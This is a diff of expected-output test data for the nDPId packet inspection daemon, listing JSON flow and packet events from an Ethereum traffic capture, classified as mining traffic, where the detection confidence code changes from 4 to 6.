00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1930,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":74,"flow_packet_id":1,"flow_last_seen":1578508366073,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508366073,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGPnfAqAG4zr1rI91udl8AOSk+AAAAALAC\/\/8AywAAAgQFtAEDAwUBAQgKItiZ0wAAAAAEAgAA"} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1939,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":2,"flow_last_seen":1578508366081,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508366081,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8jPoAACgGJqAN+w7HwKgBuHZf3WZ3LeB+TwsEYqASaN+zCgAAAgQFrAQCCAoTnX6eItiY9AEDAws="} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1941,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":3,"flow_last_seen":1578508366081,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508366081,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGW6LAqAG4DfsOx91mdl9PCwRidy3gf4AQECw5oQAAAQEICiLYmdkTnX6e"} -00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1951,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365828,"flow_last_seen":1578508366083,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":404,"flow_tot_l4_payload_len":404,"flow_avg_l4_payload_len":101,"midstream":0,"thread_ts_msec":1578508366083,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"13.251.14.199","src_port":56678,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1951,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365828,"flow_last_seen":1578508366083,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":404,"flow_tot_l4_payload_len":404,"flow_avg_l4_payload_len":101,"midstream":0,"thread_ts_msec":1578508366083,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"13.251.14.199","src_port":56678,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1968,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":74,"flow_packet_id":2,"flow_last_seen":1578508366117,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508366117,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGSnvOvWsjwKgBuHZf3W6FBUsAADkpP6AScSCofQAAAgQFrAQCCApn2sBGItiZ0wEDAwc="} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1969,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":74,"flow_packet_id":3,"flow_last_seen":1578508366117,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508366117,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGPoPAqAG4zr1rI91udl8AOSk\/hQVLAYAQECw4DwAAAQEICiLYmfpn2sBG"} -00765{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1970,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508366073,"flow_last_seen":1578508366119,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":407,"flow_tot_l4_payload_len":407,"flow_avg_l4_payload_len":101,"midstream":0,"thread_ts_msec":1578508366119,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"206.189.107.35","src_port":56686,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00804{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"finished","flow_packets_processed":33,"flow_first_seen":1578508365226,"flow_last_seen":1578508366012,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":539,"flow_tot_l4_payload_len":1302,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"138.75.171.190","src_port":56657,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00802{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1578508365852,"flow_last_seen":1578508366055,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":447,"flow_tot_l4_payload_len":447,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"138.59.17.58","src_port":56680,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00804{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"finished","flow_packets_processed":61,"flow_first_seen":1578508365045,"flow_last_seen":1578508365241,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":410,"flow_tot_l4_payload_len":1560,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"185.219.133.62","src_port":56645,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00804{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":54,"flow_first_seen":1578508365153,"flow_last_seen":1578508365387,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":462,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.228.250.140","src_port":56650,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00807{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1578508365189,"flow_last_seen":1578508365942,"flow_idle_time":200000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":1057,"flow_tot_l4_payload_len":2209,"flow_avg_l4_payload_len":315,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"18.219.167.159","src_port":30303,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1578508365846,"flow_last_seen":1578508366076,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":386,"flow_tot_l4_payload_len":1268,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.228.158.52","src_port":56679,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00802{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"finished","flow_packets_processed":50,"flow_first_seen":1578508365741,"flow_last_seen":1578508366031,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":547,"flow_tot_l4_payload_len":1803,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"94.68.55.162","src_port":56674,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00804{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":37,"flow_first_seen":1578508364832,"flow_last_seen":1578508365305,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":413,"flow_tot_l4_payload_len":1122,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"162.228.29.160","src_port":56635,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00805{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1578508365885,"flow_last_seen":1578508366042,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":1332,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"207.180.206.216","src_port":56681,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1578508365295,"flow_last_seen":1578508365885,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":435,"flow_tot_l4_payload_len":1172,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.229.232.19","src_port":56662,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00807{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1578508364925,"flow_last_seen":1578508364954,"flow_idle_time":200000,"flow_min_l4_payload_len":171,"flow_max_l4_payload_len":1057,"flow_tot_l4_payload_len":1653,"flow_avg_l4_payload_len":551,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.180.246.169","src_port":30303,"dst_port":30301,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00806{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1578508364697,"flow_last_seen":1578508364773,"flow_idle_time":200000,"flow_min_l4_payload_len":171,"flow_max_l4_payload_len":1136,"flow_tot_l4_payload_len":1651,"flow_avg_l4_payload_len":550,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"54.36.160.211","src_port":30303,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00804{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1578508365567,"flow_last_seen":1578508365567,"flow_idle_time":200000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":128,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":128,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"106.12.39.168","src_port":30303,"dst_port":30333,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00804{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1578508366073,"flow_last_seen":1578508366119,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":407,"flow_tot_l4_payload_len":407,"flow_avg_l4_payload_len":101,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"206.189.107.35","src_port":56686,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00804{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":42,"flow_first_seen":1578508364522,"flow_last_seen":1578508364664,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":495,"flow_tot_l4_payload_len":1247,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.158.244.151","src_port":56615,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00765{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1970,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508366073,"flow_last_seen":1578508366119,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":407,"flow_tot_l4_payload_len":407,"flow_avg_l4_payload_len":101,"midstream":0,"thread_ts_msec":1578508366119,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"206.189.107.35","src_port":56686,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00804{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"finished","flow_packets_processed":33,"flow_first_seen":1578508365226,"flow_last_seen":1578508366012,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":539,"flow_tot_l4_payload_len":1302,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"138.75.171.190","src_port":56657,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00802{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1578508365852,"flow_last_seen":1578508366055,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":447,"flow_tot_l4_payload_len":447,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"138.59.17.58","src_port":56680,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00804{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"finished","flow_packets_processed":61,"flow_first_seen":1578508365045,"flow_last_seen":1578508365241,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":410,"flow_tot_l4_payload_len":1560,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"185.219.133.62","src_port":56645,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00804{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":54,"flow_first_seen":1578508365153,"flow_last_seen":1578508365387,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":462,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.228.250.140","src_port":56650,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00807{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1578508365189,"flow_last_seen":1578508365942,"flow_idle_time":200000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":1057,"flow_tot_l4_payload_len":2209,"flow_avg_l4_payload_len":315,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"18.219.167.159","src_port":30303,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1578508365846,"flow_last_seen":1578508366076,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":386,"flow_tot_l4_payload_len":1268,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.228.158.52","src_port":56679,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00802{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"finished","flow_packets_processed":50,"flow_first_seen":1578508365741,"flow_last_seen":1578508366031,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":547,"flow_tot_l4_payload_len":1803,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"94.68.55.162","src_port":56674,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00804{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":37,"flow_first_seen":1578508364832,"flow_last_seen":1578508365305,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":413,"flow_tot_l4_payload_len":1122,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"162.228.29.160","src_port":56635,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00805{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1578508365885,"flow_last_seen":1578508366042,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":1332,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"207.180.206.216","src_port":56681,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1578508365295,"flow_last_seen":1578508365885,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":435,"flow_tot_l4_payload_len":1172,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.229.232.19","src_port":56662,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00807{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1578508364925,"flow_last_seen":1578508364954,"flow_idle_time":200000,"flow_min_l4_payload_len":171,"flow_max_l4_payload_len":1057,"flow_tot_l4_payload_len":1653,"flow_avg_l4_payload_len":551,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.180.246.169","src_port":30303,"dst_port":30301,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00806{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1578508364697,"flow_last_seen":1578508364773,"flow_idle_time":200000,"flow_min_l4_payload_len":171,"flow_max_l4_payload_len":1136,"flow_tot_l4_payload_len":1651,"flow_avg_l4_payload_len":550,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"54.36.160.211","src_port":30303,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00804{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1578508365567,"flow_last_seen":1578508365567,"flow_idle_time":200000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":128,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":128,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"106.12.39.168","src_port":30303,"dst_port":30333,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 